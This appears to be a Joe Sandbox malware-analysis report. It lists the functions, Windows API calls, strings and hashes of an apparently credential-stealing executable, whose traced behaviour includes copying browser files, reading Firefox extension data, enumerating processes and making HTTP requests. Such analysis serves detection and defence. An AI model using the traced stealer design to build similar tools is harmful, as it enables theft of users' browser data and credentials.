lstrlenA.KERNEL32(00000000), ref: 0040A5EA

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000,00000000), ref: 0040A32D
DeleteFileA.KERNEL32(00000000), ref: 0040A671

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 04ae8752176f1e1c15df5e2cf88b27aff6190bd66727360d2f4a8a06fa7bd979
Instruction ID: babd7ff3150fa9bd4e199d5026f054df416ea87c2dc191fa558e2381e0c2d671
Opcode Fuzzy Hash: 04ae8752176f1e1c15df5e2cf88b27aff6190bd66727360d2f4a8a06fa7bd979
Instruction Fuzzy Hash: 17D12472811108AACB14FBA5DC96EEE7338AF14314F50815EF51772091EF786A9CCB7A

Function 0040D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,026B8CB8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D641
lstrlenA.KERNEL32(00000000), ref: 0040D7DF
lstrlenA.KERNEL32(00000000), ref: 0040D7F3
DeleteFileA.KERNEL32(00000000), ref: 0040D872

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 28cd8867f3edc0051ca3f1d69979163edba46ee073ac8cac56abd5eda4a564a1
Instruction ID: b9a8a4b288ee9f939e53bd87e1647cffb120ee14b7120403b064e1d16f2d4ef2
Opcode Fuzzy Hash: 28cd8867f3edc0051ca3f1d69979163edba46ee073ac8cac56abd5eda4a564a1
Instruction Fuzzy Hash: DC814472911108ABCB14FBB1DC96EEE7339AF54318F40452EF40772091EF786A58CB6A

Function 0040F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421524,00420D7A), ref: 0040F38C
lstrlenA.KERNEL32(00000000), ref: 0040F3AB

Strings

moz-extension+++, xrefs: 0040F3ED
^userContextId=4294967295, xrefs: 0040F3DC

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: 428f95cb0d5c3163f6c2d9ede2a14129379e93307325582436a18086db45cb0c
Instruction ID: 29c62e45bd112fa8e6d3d1c16e218030d21c495d55cc38802304d1b40baba72e
Opcode Fuzzy Hash: 428f95cb0d5c3163f6c2d9ede2a14129379e93307325582436a18086db45cb0c
Instruction Fuzzy Hash: D2513175D01108AACB04FBB1DC56DEE7338AF94314F40812EF81767191EE7C6A58CB6A

Function 00418120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
Process32First.KERNEL32(?,00000128), ref: 0041817E
Process32Next.KERNEL32(?,00000128), ref: 00418193

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindCloseChangeNotification.KERNEL32(?), ref: 00418201

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 51c8e0a093d770145a0432eb5bec22896ac63dbf16dc78255c8ca8107eabaa7c
Instruction ID: 6084a3a81ad9197a86b05fcc5bdad381a42aa545a74b9a2169b69cd5b8afd334
Opcode Fuzzy Hash: 51c8e0a093d770145a0432eb5bec22896ac63dbf16dc78255c8ca8107eabaa7c
Instruction Fuzzy Hash: 8E319E71902218ABCB24EF95DC45FEEB778EF04710F10419EE50AA21A0DF386E85CFA5

Function 00416593 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,026B6470,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,026B6470,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction ID: a64f93d993f1e87f951aacd978fe42101be04856bc676c4d6d5bcee74d417e49
Opcode Fuzzy Hash: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction Fuzzy Hash: F0F08230900605FFEB20ABA0EC09BFE7736AF04715F11441BB916A51D5CBF89582CA6E

Function 00414CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,026DADC0), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,026DA3D8,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Strings

ERROR, xrefs: 00414D53
ERROR, xrefs: 00414CFA

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: c9138222a55dae4a6641ab91aade121dbb9fb8a91a2cfec8e4ac659c811cf2fa
Instruction ID: 9b7a9698bb488a37f3de611b15de8acf20b28e6af01427a962a44d236a29daab
Opcode Fuzzy Hash: c9138222a55dae4a6641ab91aade121dbb9fb8a91a2cfec8e4ac659c811cf2fa
Instruction Fuzzy Hash: 7F113330901108B7CB14FF61DC56AED7338AF50354F90816EF80B5A5A2EF786B95C75A

Function 00414A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414A5A
lstrcat.KERNEL32(?,00421040), ref: 00414A77
lstrcat.KERNEL32(?,026BBFC8), ref: 00414A8B
lstrcat.KERNEL32(?,00421044), ref: 00414A9D

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 3426ebc578b02c432677cdb303f2b9e3c7d278b9310541b44e93795a92bf0f87
Instruction ID: 8dbf70b05384144c92fb0b395b2fe843caac1dc39a8cdd365ca80c12b48963c0
Opcode Fuzzy Hash: 3426ebc578b02c432677cdb303f2b9e3c7d278b9310541b44e93795a92bf0f87
Instruction Fuzzy Hash: B6214F76A002086BC724FBA0EC42EDD373DAF94304F40845EB94A571D1EE7856C98BA5

Function 00414690 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 004146CA
lstrcat.KERNEL32(?,026D9900), ref: 004146E8

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
Part of subcall function 004143F0: lstrcat.KERNEL32(?,026BBF28), ref: 0041452A
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611

Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144E7

Strings

5\A, xrefs: 0041470F, 00414744, 0041477A, 004147AF, 004147E5, 0041481A, 0041483F, 00414712, 00414747, 0041477D, 004147B2, 004147E8, 0041481D

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 5\A
API String ID: 2104210347-3392445751
Opcode ID: 40d424ef235f329345acbbde453707475739f07353333ae1a21f4574a095ce7a
Instruction ID: 53e7b7cde32fa2def73dba0ef3da04c4d4f6f11e0d96676858e1097c5765331f
Opcode Fuzzy Hash: 40d424ef235f329345acbbde453707475739f07353333ae1a21f4574a095ce7a
Instruction Fuzzy Hash: 1441EBB660010467CB64FB64EC83EEE333DAB84304F40855EB94997191ED795ACD8BE6

Function 00417380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5

Function 6C6D3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C6D3095

Part of subcall function 6C6D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
Part of subcall function 6C6D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
Part of subcall function 6C6D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
Part of subcall function 6C6D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
Part of subcall function 6C6D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
Part of subcall function 6C6D35A0: __aulldiv.LIBCMT ref: 6C6D36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D309F

Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6D30BE

Part of subcall function 6C6D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C6D3127
Part of subcall function 6C6D30F0: __aulldiv.LIBCMT ref: 6C6D3140

Part of subcall function 6C70AB2A: __onexit.LIBCMT ref: 6C70AB30

Memory Dump Source

